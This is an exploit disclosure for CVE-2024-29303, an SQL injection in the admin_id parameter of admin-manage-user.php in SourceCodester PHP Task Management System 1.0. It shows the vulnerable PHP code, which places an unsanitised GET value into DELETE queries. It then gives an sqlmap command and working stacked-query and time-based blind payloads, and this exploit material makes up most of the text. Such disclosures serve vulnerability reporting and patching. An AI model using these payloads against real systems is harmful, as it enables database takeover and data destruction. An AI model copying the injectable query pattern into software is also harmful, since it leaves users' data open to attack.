```text # Exploit Title: SourceCodester PHP Task Management System 1.0 (admin-manage-user.php) - SQL Injection # Date: 22 March 2024 # Exploit Author: Gnanaraj Mauviel (@0xm3m) # Vendor Homepage: https://www.sourcecodester.com/php/17217/employee-management-system-php-and-mysql-free-download.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/mayuri_k/taskmatic.zip # Version: v1.0 # CVE: CVE-2024-29303 # Tested on: Mac OSX, XAMPP, Apache, MySQL ------------------------------------------------------------------------------------------------------------------------------------------- Source Code(taskmatic/admin-manage-user.php): if(isset($_GET['delete_user'])){ $action_id = $_GET['admin_id']; $task_sql = "DELETE FROM task_info WHERE t_user_id = $action_id"; $delete_task = $obj_admin->db->prepare($task_sql); $delete_task->execute(); $attendance_sql = "DELETE FROM attendance_info WHERE atn_user_id = $action_id"; $delete_attendance = $obj_admin->db->prepare($attendance_sql); $delete_attendance->execute(); $sql = "DELETE FROM tbl_admin WHERE user_id = :id"; $sent_po = "admin-manage-user.php"; $obj_admin->delete_data_by_this_method($sql,$action_id,$sent_po); } -> sqlmap -u "http://localhost/taskmatic/taskmatic/admin-manage-user.php?delete_user=delete_user&admin_id=28" --cookie="Cookie: PHPSESSID=plhvl5e53hbuvq9stj21mesirj" --batch --dbs --- Parameter: admin_id (GET) Type: stacked queries Title: MySQL >= 5.0.12 stacked queries (comment) Payload: delete_user=delete_user&admin_id=28;SELECT SLEEP(5)# Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: delete_user=delete_user&admin_id=28 AND (SELECT 9863 FROM (SELECT(SLEEP(5)))wYJM) --- ```